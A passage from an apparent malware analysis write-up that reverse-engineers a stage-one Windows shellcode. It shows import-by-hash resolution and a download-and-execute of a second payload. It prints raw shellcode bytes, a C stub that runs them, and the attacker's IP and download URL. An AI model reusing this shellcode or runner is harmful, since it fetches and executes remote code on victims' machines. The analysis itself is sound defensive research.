0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x56, 0x41, 0x5a, 0x6b, 0x00, 0xae, 0x9d, 0x5a, 0xcd, 0xe3, 0x56, 0xf8, 0xdc, 0xf8, 0x62, 0x46, 0xdd, 0x3c, 0x26, 0xc1, 0x20, 0x83, 0x8f, 0x5a, 0xec, 0x3e, 0x63, 0xbe, 0x0d, 0x4d, 0xf6, 0xda, 0x4e, 0xaa, 0x5c, 0x0d, 0x67, 0x3e, 0xb1, 0x91, 0x17, 0x17, 0x2a, 0xc1, 0xbb, 0xdd, 0x22, 0x43, 0x1b, 0xee, 0x84, 0xb0, 0x1a, 0x9b, 0x95, 0x7b, 0xac, 0x63, 0x9c, 0x61, 0x22, 0x0d, 0xa9, 0x91, 0xdd, 0x84, 0x40, 0x7e, 0x80, 0x0f, 0x5a, 0x59, 0x17, 0x89, 0x23, 0x7e, 0x99, 0xc4, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x31, 0x3b, 0x20, 0x57, 0x4f, 0x57, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x37, 0x2e, 0x30, 0x3b, 0x20, 0x72, 0x76, 0x3a, 0x31, 0x31, 0x2e, 0x30, 0x29, 0x20, 0x6c, 0x69, 0x6b, 0x65, 0x20, 0x47, 0x65, 0x63, 0x6b, 0x6f, 0x0d, 0x0a, 0x00, 0x19, 0x20, 0x55, 0xde, 0x06, 0x88, 0xc7, 0xd8, 0x09, 0x21, 0x58, 0xbb, 0x4e, 0x97, 0xf2, 0xf2, 0x22, 0xc7, 0x4d, 0x2b, 0xf7, 0x6d, 0xf1, 0x4e, 0xe9, 0xbd, 0x14, 0xa6, 0x97, 0x3c, 0xd3, 0x8e, 0xd0, 0xe3, 0x19, 0x71, 0x89, 0x21, 0xa4, 0x52, 0x4c, 0x70, 0xa7, 0x8d, 0x0a, 0x45, 0xec, 0xd9, 0xf5, 0xa6, 0xd9, 0x9f, 0x50, 0x6e, 0x19, 0xcc, 0xce, 0xc6, 0x38, 0xd6, 0xf7, 0x97, 0x6c, 0xb2, 0xaa, 0xc3, 0x93, 0xfc, 0xb2, 0xe4, 0xa8, 0x0e, 0xbd, 0x7f, 0x7c, 0x38, 0xb6, 0x8a, 0xab, 0xc7, 0x6c, 0x53, 0x0f, 0x64, 0xab, 0xb2, 0xe0, 0x2c, 0x45, 0x81, 0xb9, 0x4a, 0xd2, 0xd5, 0xcc, 0x6c, 0x69, 0x67, 0x85, 0x35, 0x95, 0x7c, 0x4d, 0x29, 0x53, 0x43, 0x53, 0xa6, 0x6c, 0x9c, 0x18, 0xf5, 0x76, 0xb3, 0xf1, 0xb2, 0xd3, 0x4a, 0xba, 0x79, 0xaf, 0xd7, 0xdf, 0x78, 0x99, 0x6a, 0x79, 0x73, 0xd8, 0x59, 0x08, 0x96, 0xb2, 0xbd, 0x96, 0x1b, 0x89, 0x0f, 0x42, 0xae, 0xd0, 0xb5, 0x39, 0xde, 0x30, 0x0e, 0x5c, 0xd1, 0x97, 0x62, 0xe8, 0x9b, 0xc8, 0x81, 0xf5, 0x07, 0xee, 0xf8, 0x98, 0xd5, 0xc6, 0x49, 0x85, 0xf7, 0x32, 0x85, 0xc9, 0xfe, 0x9a, 0xc8, 0x55, 0xd3, 0x19, 0xb2, 0xa8, 0x31, 0x80, 0x7f, 0x7e, 0x1c, 0xea, 0xb7, 0x9b, 0x9f, 0x4a, 0x80, 0x3c, 0xf6, 0x5b, 0x2a, 0xc9, 0x5c, 0xcf, 0x6c, 0x51, 0xcf, 0x87, 0x11, 0x0d, 0x3b, 0x21, 0xfc, 0x18, 0x2d, 0xf8, 0xf7, 0x65, 0xef, 0x32, 0x90, 0x17, 0xd5, 0x15, 0x28, 0x95, 0x0b, 0x1d, 0x26, 0x0c, 0xf8, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x34, 0x36, 0x2e, 0x31, 0x30, 0x31, 0x2e, 0x31, 0x34, 0x31, 0x2e, 0x39, 0x36, 0x00, 0x18, 0x88, 0xb5, 0x8b};
void _start() {
void (*foo)() = (void(*)())array;
foo();
}
The shellcode starts by a call, and the called function starts like this :
pop ebp
push 74656Eh
push 696E6977h
push esp
push 726774Ch
call ebp
The pop ebp
reads the EIP saved by the first call, and later ebp is called : right after the first call, there is a function.
The first 2 push
are actually pushing wininet
on the stack, and the third (push esp
) pushes the address of this string on the stack. This is very easy to spot with a debugger.
Then another int is pushed (0x0726774C), and finally we call the function stored in ebp.
Now, let’s think a bit : “wininet” is a Dll with network related functions the shelcode is going to need. This is very likely some kind of LoadLibrary
. Let’s reverse this “ebp” function, keeping in mind that before the LoadLibrary
parameter, an exceeding int was pushed on the stack (0x0726774C).
Import by hash
The “ebp” function starts by reading the InMemoryOrderModuleList
from the PEB : it is going to run through every loaded modules, probably looking for the function to run. The uppercase module name is hashed using a simple classic “rot13” algorithm :
Then the function checks if the current explored module has an export table (by looking at its PE header) :
If there is no export table, it passed on to the next module. If there is one, it loads the list of function names, and goes through it. When it reaches the end, the next module is loaded.
For each function name, the name is hashed using the same algorithm as before :
Then the sum of the 2 hashes (function and Dll name) is compared to the hash passed on the stack before the call (0x0726774C). If it matches, the address of function pointed to is retrieved, the stack is cleaned, the hash on the stack is removed, and the shellcode jumps on the function:
Breaking on the last jump is an easy way to know which function is called, and as expected the first call ebp
turns out to be LoadLibraryA("wininet")
.
As it is a small shellcode, just keeping the breakpoint on jmp eax
will be the fastest option to know which function is executed. In a more complexe program, a small python script could run through all DLL in system32
, and compute all their hashes, which could then be recognized automatically in the disassebmly with an IDA plugin.
This method of running a function, called “import by hash” is a simple yet effective way to hide the function used by the shellcode. There is no “LoadLibrary” or “InternetOpen” string in the code, and it takes a bit of effort to know which function is runned each time call ebp
is called.
Program logic
Once the “ebp” function is reversed, the rest is pretty straightforward. The classic shellcode tips are there, like using call
to push a string address on the stack :
Here the call
is used to store the IP string address in ebx.
Following the calls, the shellcode downloads (InternetOpenA
, InternetConnectA
, HttpOpenRequestA
, HttpSendRequestA
) an x86 shellcode at the URL http://46.101.141.96/VAzk
(in cleartext) and jumps on it. Nothing much to say here.
Conclusion
This is a simple stage 1 infection, downloading and executing code from a remote serveur. Unfortunately, the server was down at the time of this analysis, so we’ll never know what the second stage was going to do.